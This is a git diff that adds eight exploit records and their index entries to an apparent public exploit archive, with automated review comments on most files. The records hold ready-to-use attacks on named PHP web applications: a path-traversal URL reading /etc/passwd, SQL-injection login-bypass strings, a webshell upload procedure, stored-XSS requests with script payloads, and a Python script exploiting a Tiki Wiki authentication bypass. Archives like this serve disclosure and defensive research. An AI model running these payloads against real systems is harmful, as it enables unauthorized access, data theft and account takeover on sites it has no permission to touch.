diff --git a/exploits/php/webapps/48920.txt b/exploits/php/webapps/48920.txt
new file mode 100644
index 000000000..5c233471c
--- /dev/null
+++ b/exploits/php/webapps/48920.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Hrsale 2.0.0 - Local File Inclusion
+# Date: 10/21/2020
+# Exploit Author: Sosecure
+# Vendor Homepage: https://hrsale.com/index.php
+# Version: version 2.0.0
+
+Description:
+This exploit allow you to download any readable file from server with out permission and login session.
+
+Payload :
+ https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd
+POC:
+
+ 1. Access to HRsale application and browse to download path with payload
+ 2. Get /etc/passwd
\ No newline at end of file
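Review bot: The title line classifies this as "Local File Inclusion", but the payload on the `https://hrsale/download?type=files&filename=...` line and the sentence about downloading any readable file describe a path-traversal file download (the server returns the file; nothing is included or executed), so the header and the CSV title do not name the actual defect class. The record carries no CVE, vendor-notification or fixed-version line, which is what a defender needs to triage it; an explicit `# CVE: N/A` / `# Fix status: <unknown>` pair (or the real values if known) would help. The root cause is presumably the `filename` parameter reaching the filesystem without canonicalisation against the intended directory — confirm against the handler before stating it.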
diff --git a/exploits/php/webapps/48921.txt b/exploits/php/webapps/48921.txt
new file mode 100644
index 000000000..06c34fcda
--- /dev/null
+++ b/exploits/php/webapps/48921.txt
@@ -0,0 +1,43 @@
+# Exploit Title: School Faculty Scheduling System 1.0 - Stored Cross Site Scripting
+# Date: 21/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+Step 1: Open the URL http://localhost/schoolFSS/scheduling/admin/index.php?page=courses
+
+Step 2: use payload in Course and Description field
+
+Malicious Request
+
+POST /schoolFSS/scheduling/admin/ajax.php?action=save_course HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------168636252127671582243354784793
+Content-Length: 478
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=courses
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re
+
+-----------------------------168636252127671582243354784793
+Content-Disposition: form-data; name="id"
+
+
+-----------------------------168636252127671582243354784793
+Content-Disposition: form-data; name="course"
+
+
+-----------------------------168636252127671582243354784793
+Content-Disposition: form-data; name="description"
+
+
+-----------------------------168636252127671582243354784793--
+
+Step 3: Cookie will be reflected each time someone visits the Course List section.
\ No newline at end of file
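Review bot: The multipart body recorded under `Content-Disposition: form-data; name="course"` and `name="description"` is empty, so the request as written does not carry whatever step 2 asks the reader to put in those fields, and `Content-Length: 478` no longer matches the body shown; the file should say whether this is a template or was truncated during editing. Step 3 says "Cookie will be reflected", but what it describes is a stored sink rendered on the Course List page, which conflicts with the "Stored" classification in the title — "the injected value is rendered" would be accurate. The `PHPSESSID=...` value is a lab artifact and could be a placeholder.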
diff --git a/exploits/php/webapps/48922.txt b/exploits/php/webapps/48922.txt
new file mode 100644
index 000000000..37ac58d4b
--- /dev/null
+++ b/exploits/php/webapps/48922.txt
@@ -0,0 +1,31 @@
+# Exploit Title: School Faculty Scheduling System 1.0 - Authentication Bypass
+# Date: 21/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+Step 1: Open the URL http://localhost/schoolFSS/scheduling/admin
+
+Step 2: use payload jyot' or 1=1# in user and password field
+
+Malicious Request
+
+POST /schoolFSS/scheduling/admin/ajax.php?action=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 55
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/schoolFSS/scheduling/admin/login.php
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re
+
+username=jyot'+or+1%3D1+%23&password=jyot'+or+1%3D1+%23
+
+Step 3: You will be logged in as admin.
\ No newline at end of file
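Review bot: The title calls this an "Authentication Bypass", but the mechanism shown on the `username=jyot'+or+1%3D1+%23&password=...` line is SQL injection in the login handler's `username`/`password` parameters; the bypass is the consequence and the injection is the defect to fix, so the classification (and the CSV description) should name it, which also matters for severity triage. As with the sibling record there is no CVE or fix-status line. The remediation is parameterized queries in the `ajax.php?action=login` handler — inferred from the payload, not confirmed from source.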
diff --git a/exploits/php/webapps/48923.txt b/exploits/php/webapps/48923.txt
new file mode 100644
index 000000000..44f1fc50a
--- /dev/null
+++ b/exploits/php/webapps/48923.txt
@@ -0,0 +1,17 @@
+# Exploit Title: GOautodial 4.0 - Authenticated Shell Upload
+# Author: Balzabu
+# Discovery Date: 07-23-2020
+# Vendor Homepage: https://goautodial.org/
+# Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html
+# Tested Version: 4.0 (Last relase as of today)
+# Tested on OS: CentOS 7
+
+# STEPS TO REPRODUCE:
+
+1 - Log in as an agent
+2 - Write a new message to user goadmin with random subject and text
+3 - Attach your webshell to the message
+4 - Access your shell at
+https://www.foo.com/uploads/year/month/shellname.php ( Example:
+https://XXX.XXX.XXX.XXX/uploads/2020/07/shell.php )
+5 - Priv esc and enjoy ... :-)
\ No newline at end of file
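Review bot: The header keys differ from the sibling records (`# Author:`, `# Discovery Date:`, `# Tested Version:` instead of `# Exploit Author:`, `# Date:`, `# Version:`), which breaks the consistency that tooling parsing these headers relies on; align them. The discovery date 07-23-2020 is three months before the 2020-10-21 index entry and nothing states whether the vendor was notified or a fix exists, so a disclosure/fix-status line would help triage. The advisory also does not say what attachment-type check, if any, the message-upload path applies, so the root cause — a missing extension/content allow-list versus an uploads directory that executes scripts — is unclear and should be stated or marked unknown.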
diff --git a/exploits/php/webapps/48924.txt b/exploits/php/webapps/48924.txt
new file mode 100644
index 000000000..3b75d932c
--- /dev/null
+++ b/exploits/php/webapps/48924.txt
@@ -0,0 +1,85 @@
+# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Product Name)
+# Exploit Author: Adeeb Shah (@hyd3sec)
+# Date: August 2, 2020
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
+# Version: 1.0
+# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4
+
+
+# Vulnerability Details
+# Description A persistent cross-site scripting vulnerability exists within the 'Product Name' parameter in the Edit Product function.
+# This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Product Name value expected.
+
+#Steps:
+
+ 1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit)
+
+ 2. Click "Product"
+
+ 3. Click "Action" in any categories name row
+
+ 4. Click Edit, then Product Info (tab)
+
+ 5. In "Product Name" field enter XSS
+
+ 6. Click save changes
+
+ 7. Any page on the webapp expecting that 'Product Name' will trigger the XSS.
+
+
+
+POST /stock/php_action/editProduct.php HTTP/1.1
+Host: 192.168.222.132
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.222.132/stock/product.php
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------147762840819880874581057152477
+Content-Length: 938
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8
+
+
+-----------------------------147762840819880874581057152477
+Content-Disposition: form-data; name="editProductName"
+
+
+
+-----------------------------147762840819880874581057152477
+Content-Disposition: form-data; name="editQuantity"
+
+
+9
+-----------------------------147762840819880874581057152477
+Content-Disposition: form-data; name="editRate"
+
+
+
+1200
+-----------------------------147762840819880874581057152477
+Content-Disposition: form-data; name="editBrandName"
+
+
+12
+-----------------------------147762840819880874581057152477
+Content-Disposition: form-data; name="editCategoryName"
+
+
+
+7
+-----------------------------147762840819880874581057152477
+Content-Disposition: form-data; name="editProductStatus"
+
+
+
+1
+-----------------------------147762840819880874581057152477
+Content-Disposition: form-data; name="productId"
+
+
+8
+-----------------------------147762840819880874581057152477--
\ No newline at end of file
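Review bot: Step 1 requires admin privileges and the advisory never states who renders the "Product Name" sink, so as recorded the impact is indistinguishable from admin self-XSS; a sentence naming the lower-privileged pages or roles that display the stored value is needed for severity (the same gap exists in 48925 and 48926). The multipart body under `name="editProductName"` is blank, so the request as shown does not carry the value step 5 refers to and `Content-Length: 938` no longer matches the body; 48925 and 48926 include their form bodies, so this one looks truncated. The phrase "persistent XSS attack which is persistent" on the second `# Description` line is redundant in all three files.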
diff --git a/exploits/php/webapps/48925.txt b/exploits/php/webapps/48925.txt
new file mode 100644
index 000000000..adb213327
--- /dev/null
+++ b/exploits/php/webapps/48925.txt
@@ -0,0 +1,47 @@
+# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Categories Name)
+# Exploit Author: Adeeb Shah (@hyd3sec)
+# Date: August 2, 2020
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
+# Version: 1.0
+# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4
+
+
+# Vulnerability Details
+# Description A persistent cross-site scripting vulnerability exists within the 'Categories Name' parameter in the edit brand function.
+# This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Categories Name value expected.
+
+#Steps:
+
+ 1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit)
+
+ 2. Click "Category"
+
+ 3. Click "Action" in any categories name row
+
+ 4. Click Edit
+
+ 5. In "Categories Name" field enter XSS
+
+ 6. Click save changes
+
+ 7. Any page on the webapp expecting that 'Categories Name' will trigger the XSS.
+
+POST /stock/php_action/editCategories.php HTTP/1.1
+Host: 192.168.222.132
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.222.132/stock/categories.php
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 102
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8
+
+
+
+
+editCategoriesName=%3Cscript%3Ealert(%22hyd3sec%22)%3C%2Fscript%3E&editCategoriesStatus=1&editCategoriesId=9
\ No newline at end of file
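Review bot: The `# Description` line says the parameter is in "the edit brand function", but this record is about the Categories Name field and the request goes to `editCategories.php`; this is a copy-paste from the Brand Name record and should read "edit categories function". Step 1 refers to "the Auth Login Bypass exploit" without an identifier, so a reader cannot find the record it depends on; cite its EDB id or drop the reference.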
diff --git a/exploits/php/webapps/48926.txt b/exploits/php/webapps/48926.txt
new file mode 100644
index 000000000..4e45f1f03
--- /dev/null
+++ b/exploits/php/webapps/48926.txt
@@ -0,0 +1,44 @@
+# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Brand Name)
+# Exploit Author: Adeeb Shah (@hyd3sec)
+# Date: August 2, 2020
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
+# Version: 1.0
+# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4
+
+
+# Vulnerability Details
+# Description A persistent cross-site scripting vulnerability exists within the 'Brand Name' parameter in the edit brand function.
+# This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Brand Name value expected.
+
+#Steps:
+
+ 1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit)
+
+ 2. Click "Brand"
+
+ 3. Click "Action" in any brand name row
+
+ 4. Click Edit
+
+ 5. In "Brand Name" field enter XSS
+
+ 6. Click save changes
+
+ 7. Any page on the webapp expecting that 'Brand Name' will trigger the XSS.
+
+POST /stock/php_action/editBrand.php HTTP/1.1
+Host: 192.168.222.132
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.222.132/stock/brand.php
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 78
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8
+
+editBrandName=%3Cscript%3Ealert(%22hyd3sec%22)%3C%2Fscript%3E&editBrandStatus=1&brandId=14
\ No newline at end of file
diff --git a/exploits/php/webapps/48927.py b/exploits/php/webapps/48927.py
new file mode 100755
index 000000000..64ec94583
--- /dev/null
+++ b/exploits/php/webapps/48927.py
@@ -0,0 +1,90 @@
+# Exploit Title: Tiki Wiki CMS Groupware 21.1 - Authentication Bypass
+# Date: 01.08.2020 (1st August 2020)
+# Exploit Author: Maximilian Barz aka. Silky
+# Vendor Homepage: tiki.org
+# Software Link: https://jztkft.dl.sourceforge.net/project/tikiwiki/Tiki_21.x_UY_Scuti/21.1/tiki-21.1.zip
+# Version: 21.1
+# Tested on: Kali Linux 5.7.0-kali1-amd64
+
+#!/usr/bin/env/python3
+import requests
+import json
+import lxml.html
+import sys
+
+banner = '''
+
+████████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██████ ██ ██
+ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███ ███
+ ██ ██ █████ ██ ██ █ ██ ██ █████ ██ █████ ██ ██
+ ██ ██ ██ ██ ██ ██ ███ ██ ██ ██ ██ ██ ██ ██ ██
+ ██ ██ ██ ██ ██ ███ ███ ██ ██ ██ ██ ███████ ██ ██ ██
+
+
+ █████ ██ ██ ████████ ██ ██ ███████ ███ ██ ████████ ██ ██████ █████ ████████ ██ ██████ ███ ██ ██████ ██ ██ ██████ █████ ███████ ███████
+██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
+███████ ██ ██ ██ ███████ █████ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ██ ██ ██ ██████ ████ ██████ ███████ ███████ ███████
+██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
+██ ██ ██████ ██ ██ ██ ███████ ██ ████ ██ ██ ██████ ██ ██ ██ ██ ██████ ██ ████ ██████ ██ ██ ██ ██ ███████ ███████
+
+Poof of Concept for CVE-2020-15906 by Maximilian Barz, Twitter: S1lky_1337
+'''
+
+
+
+
+def main():
+ if(len(sys.argv) < 2):
+ print(banner)
+ print("Usage: %s " % sys.argv[0])
+ print("Eg: %s 1.2.3.4 " % sys.argv[0])
+ return
+
+
+ rhost = sys.argv[1]
+ url = "http://"+rhost+"/tiki/tiki-login.php"
+
+ session = requests.Session()
+
+ def get_ticket():
+ r = requests.get(url)
+ login_page = r.text.encode('utf-8')
+ html = lxml.html.fromstring(login_page)
+ auth = html.xpath('//input[@name="ticket"]/@value')
+
+ return str(auth)[2:-2]
+
+ def get_cookie():
+ session.get(url)
+ return session.cookies.get_dict()
+
+
+ cookie = get_cookie()
+ ticket = get_ticket()
+
+ payload = {'ticket': ticket,'user':'admin', 'pass':'test','login':'','stay_in_ssl_mode_present':'y','stay_in_ssl_mode':'n'}
+ headers = {
+ 'Host': rhost,
+ 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+ 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+ 'Accept-Language': 'en-US,en;q=0.5',
+ 'Accept-Encoding': 'gzrhost, deflate',
+ 'Referer': 'http://'+rhost+'/tiki/tiki-login.php',
+ 'Content-Type': 'application/x-www-form-urlencoded',
+ 'Content-Length': '125',
+ 'Connection': 'close',
+ 'Upgrade-Insecure-Requests': '1',
+ 'Cache-Control': 'max-age=0',
+ }
+
+
+ for i in range(60):
+ r = session.post(url, payload, headers)
+ if("Account requires administrator approval." in r.text):
+ print("Admin Password got removed.")
+ print("Use BurpSuite to login into admin without a password ")
+
+
+
+if(__name__ == '__main__'):
+ main()
\ No newline at end of file
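Review bot: `session.post(url, payload, headers)` in the loop passes the header dict as the positional `json=` argument of `Session.post`, and because `data` is already supplied requests ignores it, so none of those headers (including the hard-coded `'Content-Length': '125'` and the mistyped `'gzrhost, deflate'` Accept-Encoding) are ever sent; if they are intended, write `r = session.post(url, data=payload, headers=headers)` and drop the `Content-Length` entry so requests computes it from the body. `get_ticket()` fetches the form with module-level `requests.get` instead of `session`, so the ticket it returns presumably belongs to a different server-side session than the cookie jar the POST reuses — confirm whether the target binds the ticket to the session. The shebang `#!/usr/bin/env/python3` is malformed (`env/python3` is a path, not `env python3`) and is not on line 1, so it has no effect. The loop prints on a match but never breaks or reports the no-match case, so a run that never sees the expected text exits silently; `str(auth)[2:-2]` on the xpath result is also fragile compared with `auth[0] if auth else ''`.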
diff --git a/files_exploits.csv b/files_exploits.csv
index ba10c71d9..ab5e87ad1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -40738,6 +40738,14 @@ id,file,description,date,author,type,platform,port
48917,exploits/java/webapps/48917.py,"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution",2020-10-20,"Jonatas Fil",webapps,java,
48918,exploits/php/webapps/48918.sh,"WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection",2020-10-20,"Jonatas Fil",webapps,php,
48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,
+48920,exploits/php/webapps/48920.txt,"Hrsale 2.0.0 - Local File Inclusion",2020-10-21,Sosecure,webapps,php,
+48921,exploits/php/webapps/48921.txt,"School Faculty Scheduling System 1.0 - Stored Cross Site Scripting POC",2020-10-21,"Jyotsna Adhana",webapps,php,
+48922,exploits/php/webapps/48922.txt,"School Faculty Scheduling System 1.0 - Authentication Bypass POC",2020-10-21,"Jyotsna Adhana",webapps,php,
+48923,exploits/php/webapps/48923.txt,"GOautodial 4.0 - Authenticated Shell Upload",2020-10-21,Balzabu,webapps,php,
+48924,exploits/php/webapps/48924.txt,"Stock Management System 1.0 - 'Product Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
+48925,exploits/php/webapps/48925.txt,"Stock Management System 1.0 - 'Categories Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
+48926,exploits/php/webapps/48926.txt,"Stock Management System 1.0 - 'Brand Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
+48927,exploits/php/webapps/48927.py,"Tiki Wiki CMS Groupware 21.1 - Authentication Bypass",2020-10-21,"Maximilian Barz",webapps,php,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
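Review bot: The descriptions for 48921 and 48922 carry a trailing " POC" that the files' `# Exploit Title:` lines do not, while the other six new rows mirror their file titles exactly; drop the suffix so the index matches the records (every entry here is a proof of concept). The 48922 row names the finding "Authentication Bypass" although the file shows login-form SQL injection; naming the root cause in the index helps searches by vulnerability class.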